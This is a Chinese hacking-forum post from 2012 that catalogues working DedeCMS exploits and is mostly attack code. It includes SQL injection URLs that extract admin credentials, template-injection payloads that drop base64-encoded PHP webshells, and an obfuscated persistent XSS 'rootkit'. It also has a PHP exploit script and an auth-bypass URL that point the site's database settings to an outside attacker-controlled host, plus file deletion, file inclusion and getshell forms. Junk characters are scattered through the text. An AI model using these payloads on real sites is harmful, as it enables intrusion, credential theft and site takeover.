找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3035|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

6 h! k' b1 z) B+ ~  M, E1 l9 ]Dedecms 5.6 rss注入漏洞+ x. Z; z+ ^& ?  k% i
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1% J  d& R( j5 S! p# \" m

7 {- a- \& f$ W! d
0 p+ H0 e7 U( m
: [" Y! j3 M3 ~( d- `) ?- K
4 y4 d, \% s6 I
$ y  c7 W4 f$ P+ j" e, s
9 `4 |- t# M3 F/ b* _5 Z( h. a" r3 a1 O
: s3 S4 E" J/ Z1 T, I$ Z
DedeCms v5.6 嵌入恶意代码执行漏洞, U8 Y3 J6 @" d+ L" S
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}6 k4 V) v, J+ C1 @
发表后查看或修改即可执行
2 l$ a. m. G8 C/ E' @& c( D# Ca{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}/ w' q8 s3 h' c* {% w; R# ^
生成x.php 密码xiao,直接生成一句话。
1 ~- ^1 U0 ^' r+ c, q
+ A0 f, u, e2 @1 H+ [
9 d' E  {# v8 Z( @4 _) }% w7 d3 G( H" q. W  d9 Q
+ b" I: t8 g: _) L: V
1 V! c, U5 g+ M; u4 t! X

% H! S( j2 Z8 N) {9 _% S) }( d8 Z( Q8 }5 E6 P) m$ b8 b5 H: u
  H) I/ R) X3 Q4 n) F7 N
Dede 5.6 GBK SQL注入漏洞
' G: }) G) [+ B* W
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';: C7 Q" R, t$ E  `% q
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe+ N) V% E% m% k/ r% W: G$ S* E
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7" |' }8 m6 b$ z* B% p9 T" v, w+ E% I
. @0 ~8 ?3 S/ T7 f7 a. T% o9 s

+ O1 H+ @- a6 C' q, ~& w9 e9 I; Z3 d" B4 V" E  j. B
. a) @2 b. L2 a' R& M
: q' u" ^' t# q6 m! |' |
, K& Q- |# p0 F2 E0 y
$ c4 ~& r, A/ W) E
+ P* z) V/ q1 Q+ q" H
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞: \7 v5 n* n! v! C$ G
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` ( z5 ?# J6 U0 @4 x- y- M1 R. z, U) l

* R1 p7 e% M+ n- k( \3 I/ k4 E! B: s- |

6 x3 o1 h+ Q" ?6 |; W' [+ V/ M- C6 P* x( B
/ d( |' R! t9 B2 d; |, R
, T- _" J( J% D9 W5 B) C: R. `
DEDECMS 全版本 gotopage变量XSS漏洞& w* c1 J; B4 [: Z% v0 k# P& a
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
6 ^8 K# x' N# ?
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
6 y7 g. Z9 c) N8 u1 z8 g8 W# l$ e3 w. D2 W* {! K  n

& v( K/ g" A2 C4 `3 L" n2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
9 T) R+ ^# ]3 G7 \9 X
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda& [4 J) {: Z1 U0 ^- d! i3 P
( _) ~% Q% Y+ g1 A0 C

9 G/ A$ ~+ N& \. s7 Nhttp://v57.demo.dedecms.com/dede/login.php
2 z, `# s& @9 {2 v# m0 ^0 E" p  q5 U5 I6 s' E0 v" P0 P

: ]3 k& V. U3 D- \5 Q7 Z1 vcolor=Red]DeDeCMS(织梦)变量覆盖getshell0 Y# d& p  s; |; W# f4 V. |
#!usr/bin/php -w
& S' k( Z5 C* m& R3 i' g6 d<?php
6 Q+ N8 c2 U+ F0 w# W! Y  Ierror_reporting(E_ERROR);; g; Z1 F" W" d& w" F  c
set_time_limit(0);. Q8 g: n! Y" B! H/ _" u8 D
print_r('* E& h% e- I' l
DEDEcms Variable Coverage  |/ {, j# v$ X
Exploit Author:
www.heixiaozi.comwww.webvul.com) |5 y' C* u* q) w; w/ _
);- A9 ?# h5 T7 r/ }7 g
echo "\r\n";( c' M- G* d' Z& F7 O% I: m9 s
if($argv[2]==null){
! V% B9 M# f+ ?& Xprint_r('3 ^4 |& J: a2 Y2 q5 A9 P# S( C
+---------------------------------------------------------------------------+
# _$ ]# D5 F7 F' J/ ?# t6 `; E4 lUsage: php '.$argv[0].' url aid path
  J. q- U- t: y5 K2 X  f' e9 T/ ~aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
+ G' z' Q5 I5 pExample:
& A# ]# ]8 H2 i+ X: xphp '.$argv[0].'
www.site.com 1 old* Z* c7 ]0 ^/ E2 F, D& [- G
+---------------------------------------------------------------------------+. |3 Z5 T9 c" t! r9 r+ |8 u
');
) d$ d( L2 X1 q9 B! p9 c0 Aexit;  O8 \: v. {6 Y, R
}
' \; K# ]# M; z3 w$url=$argv[1];0 K* T& t9 ^6 z) D
$aid=$argv[2];/ V9 e0 f$ a+ O7 l8 }1 c9 g5 U
$path=$argv[3];2 ^. s0 x. `" u, s  {9 R( W
$exp=Getshell($url,$aid,$path);0 y8 E) n9 {6 D7 |& h
if (strpos($exp,"OK")>12){
) K) w! H; A! g! Iecho "; g+ a. f1 l( f% {% e
Exploit Success \n";$ q' B( a7 q( ~3 j7 s5 {/ ^
if($aid==1)echo "( F1 H& r' ~& ]
Shell:".$url."/$path/data/cache/fuck.php\n" ;
# Q; Q& z3 f4 |1 I+ x' t. h8 l
: _/ \2 i( }& B( n2 W( T6 f
# C! O6 D) d7 f9 p3 {if($aid==2)echo "
! o) }: H& p8 }. C4 W& {Shell:".$url."/$path/fuck.php\n" ;. E( W" E1 Z$ `2 P4 H8 k4 f
0 \, a/ }* v$ h- v; R% U

, @$ k$ A. b9 S6 n* U  xif($aid==3)echo "
$ g$ O6 `9 F2 [4 c$ P: ~/ cShell:".$url."/$path/plus/fuck.php\n";
) v5 y1 o/ [  G+ L
* Z; o0 e  b; U/ H
  l9 l. Q8 |# r5 P6 t1 C}else{- L8 X# T% W. f
echo "9 d: ^+ @8 f) S& j* ?* {+ D
Exploit Failed \n";' d# M- J9 W/ u" r+ Z, `5 F
}: D# I% K9 N5 n- R/ }8 Z
function Getshell($url,$aid,$path){
2 ?7 W( M# x2 ^. E* q" M$id=$aid;  y- x( H" [4 s' J0 k
$host=$url;
+ V' [# t" q9 F; ^  I; u: r$port="80";  ]; p$ ]) V3 e( Z, A
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
5 }" f+ f& s' o/ |$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";1 }0 Q" R8 C# r  b. ^% D) S3 `: |
$data .= "Host: ".$host."\r\n";
* S% I' x1 w! j9 F' q3 }7 F; H+ k$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
7 [+ h' U! `( g$ J: J$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";: v0 c- @5 B6 A0 u4 `
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
! u5 o) v# G" v8 a! C5 e  ~% I//$data .= "Accept-Encoding: gzip,deflate\r\n";8 J3 P$ T0 e& w5 r# v
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";, Y  u4 B% j. F( i8 {' U, U- k
$data .= "Connection: keep-alive\r\n";
9 q3 n0 p6 \) @% K* y' Y$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
! [2 [, Q! z/ W/ h4 v8 [5 J$data .= "Content-Length: ".strlen($content)."\r\n\r\n";5 K$ W# G0 e  i. @: [
$data .= $content."\r\n";: n* w1 y5 U5 l- \! _' U
$ock=fsockopen($host,$port);/ L1 D' w9 |: m8 j7 ?3 a: P: a- p
if (!$ock) {: r, @; }, M0 b) P) L6 C; Q$ r& |
echo "
3 g+ l2 j. g; @8 bNo response from ".$host."\n";
+ P  j7 k* y2 ]) y1 g2 u3 z# g}
8 Z; x- m6 j, j# p" t" S! m5 Yfwrite($ock,$data);
' `$ C; h% w/ W! u$ E" a$ u% ewhile (!feof($ock)) {/ a: m" k7 B  [/ `: \
$exp=fgets($ock, 1024);
) X+ a, W8 A* L8 C) i) X. v: Greturn $exp;4 \: A# g* I  R
}
! T* X3 p: M4 }/ L, D5 E9 j/ Q}
* `$ u4 g8 g- Y5 X6 W- Y, M4 K6 ?/ Y6 Y" `0 l  p

9 f/ p! ]) T. ^?>
" l. ]* D% {& |
$ P% t3 g/ v9 s. T6 f2 V. Y. j" q
7 v0 O3 _& F& H/ O( q( o/ h7 e  w- R- m+ k5 s

4 k# F9 S6 |* b$ U4 t) ^
) \8 R6 o6 q0 \1 o( G6 V  L( y& o& x" }5 Q5 o4 ~6 ?, n: x' o

3 J8 r: I/ O! Z7 X4 v0 |
4 C$ x+ c( v7 Y" G
9 T/ G4 `9 U# }5 m$ ~
3 l* _2 `( J  q' a; ^DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
" F- X; y! a: [) P. ]& R, E, w
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root9 r$ G% S$ u& V0 N1 f2 y# K
" Y9 D/ n/ n- F0 ^! H7 Q) k
- _0 x7 S( C# A; C
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
7 ^: ]9 {) P$ X7 ~; N0 A9 I9 p5 A; }9 v6 x% M
5 v8 D6 \; ?, E9 s8 R
此漏洞的前提是必须得到后台路径才能实现: i& O! m, g# l

3 U7 T4 u2 k  C5 m9 z/ S% P. t# F) r& ^+ C" e0 F2 W5 `5 A

1 N9 w9 ]6 J! P( X; I$ R0 C  A9 E& T, N0 [; r
; O- x0 E: T4 G' R% j

; R8 |. H& o1 o3 L5 r. F
! y* N5 k# K% @8 s; Q5 |: ]5 r
2 V/ Z" p& N8 c: \. E3 {$ R5 C: C( e* `! }
/ G: ]* l1 P- `6 F. V
Dedecms织梦 标签远程文件写入漏洞
7 l+ p% S$ w) b( Z2 T前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');4 n6 Y0 C8 k* t3 X. v

4 t- {& n! s2 ~0 u0 O% [# j( J/ K( c7 y: D8 s, y3 M
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
1 H$ p: L( q0 r5 W) ^) P<form action="" method="post" name="QuickSearch" id="QuickSearch">
' u/ W. T; O2 Z3 U2 A<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br /># Y$ n3 h& V( t% a3 A
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />3 z: g2 M" ]  a1 G* O7 O. t
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />8 b9 q. f. @3 l/ g5 n
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />2 h6 m* G+ j1 k$ [' z& N% g$ O- n' g
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
5 Y  F# f0 A; n, V<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />0 l1 ?2 A( |8 W0 @. z; k* [) O
<input type="text" value="true" name="nocache" style="width:400">+ L2 T+ P3 i* c( A) d2 ~1 ^
<input type="submit" value="提交" name="QuickSearchBtn"><br />
* o# [6 H% u0 V; e</form>3 n' h2 }  @* _( u
<script>0 v" S  K- h) v" g4 \5 @2 o) a6 O
function addaction()% n8 E; s; M3 r3 D. h
{. y" W* N7 Q; j1 `; S
document.QuickSearch.action=document.QuickSearch.doaction.value;4 A6 f  X9 G0 x
}/ h5 k0 f5 b1 E$ o; Q% U
</script>
' S6 v4 @- t5 S  c" c0 a: f. G  }3 v2 o+ ~3 \% l
$ v1 L' R1 y: b# y- s' p5 ]6 k

3 H7 }- W* H1 O
! l+ W9 @2 Y6 O8 I; h& _3 P: R+ f- w  {+ \# U. R% F
* `2 m" X0 E' k

* n; r3 j' W( l* c
+ S$ Q2 j3 [4 d4 \/ K+ S
" |# ]& W8 A: u7 d8 h
9 U0 b! s  ^" ]' B& ~+ F9 sDedeCms v5.6 嵌入恶意代码执行漏洞
3 }- k* Y: v( |# Y5 u注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行: `: i; _5 H5 _, X, `' Y
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}  @% I! m5 P2 D, A! \  e
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得- o8 E$ v0 t% k6 E# w9 c
Dedecms <= V5.6 Final模板执行漏洞
1 p/ O4 ^5 u0 s* r/ A9 N注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
- g* c0 z  D' ^1 Y7 y3 {# ]uploads/userup/2/12OMX04-15A.jpg
& \; F8 A; i/ \3 N7 D/ j* j. q" g7 ?! c
0 R3 D; F- ~+ S/ L4 g- y* o4 w2 F7 k0 c9 I
模板内容是(如果限制图片格式,加gif89a):
  ~6 j: R9 y3 {$ {/ _8 |{dede:name runphp='yes'}, P9 r4 R9 m% F9 n9 A
$fp = @fopen("1.php", 'a');
. s6 m$ Q; e9 ?@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
) ?4 e  w9 o, F- s% ]: _1 h@fclose($fp);
) @& S9 F+ j7 c% C2 O4 k{/dede:name}' p- f6 Y; Y  A8 j9 |/ f
2 修改刚刚发表的文章,查看源文件,构造一个表单:
* |1 u$ ~4 ?/ w; s* j<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
& |1 I: q+ Y. K! x* P<input type="hidden" name="dopost" value="save" />
! ~* m( A* V7 a- m8 U* b<input type="hidden" name="aid" value="2" />
0 N: A: ~1 \% y' J6 K* \<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
! A6 |8 p( p* d/ t<input type="hidden" name="channelid" value="1" />
0 O( y2 B5 B6 X; V( m. B) c<input type="hidden" name="oldlitpic" value="" />
, c" V- l5 a4 K, ^9 U, G& B<input type="hidden" name="sortrank" value="1275972263" />
. J! Z# ~% S' H7 y6 A1 n. p( C, }  T, [) N* s8 a3 w8 C+ N
8 i7 a2 K9 }( l) e$ ?& Y  e
<div id="mainCp">
! q) r  l0 @# z# O& Q1 z" u, |<h3 class="meTitle"><strong>修改文章</strong></h3># i" v0 P5 J# V- t/ c+ c9 Z1 P
- D% [8 s( Z8 `

/ {% S  i$ f9 y- ]5 R; ?( O( X5 @7 _9 e4 q<div class="postForm">: T7 S# D* g( Y+ }8 w! b% S
<label>标题:</label>
6 v2 g: s; {1 f: c3 i<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>7 o/ a' Q) Y9 R
' h& R( _* ?, g% \9 g

4 ]9 b& i0 V3 y0 u% c* a<label>标签TAG:</label>
2 j; P  L: J- b% v) C+ {5 h<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)  A9 L' Z& A6 J! |' U2 O/ g: _! L
5 i, g* a0 }% E/ D7 w. y
# n0 ~+ x) J" p
<label>作者:</label>
6 i9 l( @9 b- i- {; ]<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>6 o4 F. C6 S0 [1 U7 ]* V

$ N4 Y+ w9 @- _2 E; B7 G  l& i% h2 f$ M! y0 b0 U( f+ o
<label>隶属栏目:</label>
. }; d# T) |$ W0 U7 U  K. v<select name='typeid' size='1'>
6 y8 F+ A* M' _* b- V<option value='1' class='option3' selected=''>测试栏目</option>- w. t! K( d1 ^" D; q( q
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
" q; s: C# d9 U; I( h3 s7 h
+ g% S" p& i( P  n
3 R# H# T' h- ]$ k3 k<label>我的分类:</label>6 X$ e. l  x8 o& u
<select name='mtypesid' size='1'>8 O  t- o8 ?; F. K9 G4 v  }- h
<option value='0' selected>请选择分类...</option>% D5 v0 W/ C5 }. [  t
<option value='1' class='option3' selected>hahahha</option>
( ~1 s$ h' F# a7 X' v# `</select>
7 h( ^1 c" |0 M9 @8 O. I
* F9 M! G; a7 k3 j/ \0 F5 {  I5 M: Q$ W9 K5 q
<label>信息摘要:</label>
$ |% b$ p, y6 {, ]<textarea name="description" id="description">1111111</textarea>
9 n& Y: ?' H: i. z$ m0 L# y- A(内容的简要说明)
& G& g8 Q! F5 N5 m; u# S( Z9 _6 Y: y; l3 Z4 f

8 y3 h0 p0 E& Z! a8 ]<label>缩略图:</label>
# I( f5 Y( H3 S+ C( B- f0 o<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
% B) g; [" O& D5 h1 ^2 P7 y" a+ s& c0 Q6 q' |3 i6 n- b) N

2 o4 c5 t, S/ t" F( K; j* T. r<input type='text' name='templet'! p) |! J* J( ]' G+ m" |, A
value="../ uploads/userup/2/12OMX04-15A.jpg">& v* }( U4 J. ?0 h
<input type='text' name='dede_addonfields'
& m) R& H) T6 o3 rvalue="templet,htmltext;">(这里构造)
7 {. C& I; [9 |0 V# U: T</div>
/ Z9 k6 n7 Y$ r( ?3 P9 X& E! J
/ K$ W$ d; y1 M' v/ g" ~! D) }0 K4 `* J% R# L9 [
<!-- 表单操作区域 -->
& f$ u, M! s. r( ]# M$ t<h3 class="meTitle">详细内容</h3>
% I# T5 i& ]3 e2 g( z! s. ?; `; R/ o% m: ?

; w0 K( `6 @: G0 Q. _5 g- o<div class="contentShow postForm">
. G* C3 Z3 F7 J  w3 ^( Q<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>2 o' e; w: v& `0 `% D" U3 D3 k
! H& C* Y5 {- k5 q5 D9 b2 z$ g% q

* d4 Y" z: H' p) [0 G<label>验证码:</label>9 I7 Y& h% N2 b+ r, c
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
% H: w, I3 |- a; }2 E7 c  D<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
: Y9 ~) `% W- m( ]
, v! V! F6 Z' p6 M! o1 K
3 F* W: ^8 n( H- p! `7 a; P<button class="button2" type="submit">提交</button>- h" T1 |* N( T1 j
<button class="button2 ml10" type="reset">重置</button>) f9 F  T3 A$ ~
</div>/ A3 k% Q1 l  J" V: e3 A2 ?

; f% ^$ X1 r$ ]' g; R: t$ d
$ S& x3 v6 u/ F  w: D+ o9 M; v% x2 s</div>, C( a9 T8 U4 f
; P0 ?. Z( s* @# c! L5 A

- b, V. x3 O: b* {</form>
' L6 @. Q0 W  `( T  L: X. g( X6 @' w- x' i& d* U1 |
* Q+ ?8 d& t' R+ w$ g% |% T" c' K
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:0 z- F; Q+ a8 @  L0 A/ c+ i
假设刚刚修改的文章的aid为2,则我们只需要访问:
$ X; B% [8 O, h( g1 G7 q  `
http://127.0.0.1/dede/plus/view.php?aid=2% R2 G) ~/ l3 m9 B. V( k
即可以在plus目录下生成webshell:1.php
" H' ^0 |# _+ j3 K# i# P, b
. _  @4 w/ T$ M8 K4 q
6 g8 H) X8 M- J: W2 G$ d" ]
9 }& D* c; }1 [8 @% T$ q% _  ]4 e2 J/ ]+ h- e6 C2 g
, i. {" i' t/ L( x" V

( D  U' m; }7 c3 V+ P
% H0 e1 i& ?: L  {* U4 |8 S! k: V; \

% y: d, p: F$ _# ~4 y, T
8 w0 {- h, K& k0 b; Y$ |& Y
" Q* @7 T5 z, I. Z* t4 O# @
* g6 Q  @0 ?/ s1 M( D2 BDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
. `! @2 x1 _7 z0 @! @8 c; I. [; sGif89a{dede:field name='toby57' runphp='yes'}
& d' h0 n, [' @5 H4 x) ]) A8 \phpinfo();& E2 Q3 u2 }2 f1 v, l+ Y5 q7 [) ~& o
{/dede:field}6 ~  ?8 s1 a! b) N0 ^; X7 ^& n
保存为1.gif) ]. ^$ c+ t: K/ T6 v6 d, u: V
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
+ v$ f8 S6 I# ^1 H/ k" k$ n<input type="hidden" name="aid" value="7" />
3 b8 f: N/ v, R<input type="hidden" name="mediatype" value="1" />
; s# W1 W% [) `8 G<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
6 z* C" p( g" M& `) d# w5 `9 {<input type="hidden" name="dopost" value="save" /> # z1 X( U3 _0 C7 {1 V: L
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 4 L# M# O* z- n' C
<input name="addonfile" type="file" id="addonfile"/>
% H" ~/ M8 }( f) D: b# H<button class="button2" type="submit" >更改</button> , J4 K3 ^8 f* ]0 Y+ u, K' C# h2 Q7 f
</form>
5 k8 S' S8 Y  w; |/ k  m& r/ ]! o8 F% R- Z4 S# Z
; i. @8 D* j! y7 D* V1 B# I6 J
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif8 n( q  k1 k: L: e! x0 s6 u
发表文章,然后构造修改表单如下:- X2 x8 l6 E$ D% d" j$ I
4 f7 x7 @2 {6 J/ d
" G+ B- c* d! y
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> & x1 Y  O0 r" I
<input type="hidden" name="dopost" value="save" />
# S# N) k' h1 I' Y3 B  M<input type="hidden" name="aid" value="2" />
* J7 `0 z/ h- R0 g9 C9 d% g  H<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
6 p2 B) r* u, [6 m) l( L% r1 x1 R<input type="hidden" name="channelid" value="1" /> 4 e0 r. Z' A/ W* A# h
<input type="hidden" name="oldlitpic" value="" />
! i3 v$ V( {' P9 m<input type="hidden" name="sortrank" value="1282049150" /> - a9 K+ Z8 e# w6 q% X& c
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> ' A9 \, d8 S7 J1 D
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 8 A. a' Z8 o. ]  V
<select name='typeid' size='1'>
0 [, V. |7 E9 B) @% U6 I# H<option value='1' class='option3' selected=''>Test</option>
9 K8 b8 S$ q. o! t<select name='mtypesid' size='1'> 5 Z5 i9 E. p, c! D3 Q# U4 }- B
<option value='0' selected>请选择分类...</option>
) A& B1 z& Q$ b( V# a<option value='1' class='option3' selected>aa</option></select>
! }/ T7 G4 \9 f! s2 k% t<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
: b! U, Q5 M5 a" W<input type='hidden' name='dede_addonfields' value="templet"> ! q' M3 m0 l* Q1 o
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> - j1 M& L+ [) w9 K' \
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 4 r" a7 l8 a+ m
<button class="button2" type="submit">提交</button>
- l. Z% m1 D; y7 {</form>
. z$ |3 Z, c$ P
; R( H) l; R( u& b* k, ~/ e* A
: R% {' n; j( b% H$ m' q+ b' _) a8 Y6 ]' u
! c( i6 h2 y7 |$ n( G9 t

: P  B+ B  `! K
% k7 c8 @$ [0 F7 [$ c; r0 H( B6 q1 R2 ~7 v6 X6 @& ?6 n

: D/ J* @3 N) A# e: F. ^7 q3 f0 r$ J/ }" k, c# h3 d5 a
' P# i5 y* _% x' q1 w* O8 T
* _4 C" V4 R5 B1 }8 q6 U% t

) X- l# `. R" G/ _& g5 h5 C/ B+ r% Z5 u织梦(Dedecms)V5.6 远程文件删除漏洞" c6 ^( A6 q3 J8 c6 u2 i4 y
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
1 a& d5 }2 ~( _! N8 N4 [$ l
* x3 ^  `/ r+ C6 @& s& I. i/ b' T: M6 e) s: w
. d% c/ T; `5 A; [# `) k& F+ H- M
* O! d; q' G2 W4 p, d
$ f, C) w* u1 G" Q$ ?2 }" V
) e. D; L& E3 X& h# R. `
% p1 P. \, C- @& Q: y# P
# a* q, c- j3 T
6 Z$ y; v' ?# w- l2 {0 V3 t

+ w6 G2 L+ ]1 b8 g7 h8 S7 k织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
& x. t8 B1 l. L) g/ r6 \/ ~
http://www.test.com/plus/carbuya ... urn&code=../../
) Y' _- s- R& U$ y8 v
) H. ?; d8 |4 d1 G0 L/ B/ Y' e0 \* |# M8 O
# w: P$ d9 P# Y1 C
6 h" v) D  P6 |4 U; K

$ ?: h  o0 n- h( n7 u1 I% `
. U1 L4 |7 s/ J5 E! ~+ s7 o1 J
+ L$ t. O" F. S7 t: s
3 R, D6 U, R. w5 ]8 `4 ]0 f. R0 a' O6 Y5 J

: R+ z) _6 x! f2 ~  G, |3 T6 k; T1 s% eDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 . n7 \2 Z4 k+ O4 k* [
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`$ O/ b7 n# K+ n- v
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD53 j( J, R! U' ?2 h* I0 ~) k
; S# H# S: L! v3 E& W2 a
5 k9 T$ t) H) E

7 u. @0 _! d  D. l
$ ?6 \* o  m* e2 g3 P) w; o* n8 {
' o' R5 `# }' G+ Z2 V  J. s( z; z( B0 S9 ]" D

% I+ C; [6 M3 ^2 F/ v' E( l  T4 Z+ ?& a

9 m* e, E" O" D8 O! e0 I. z: N% `, B4 E0 @% \" ^& O
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
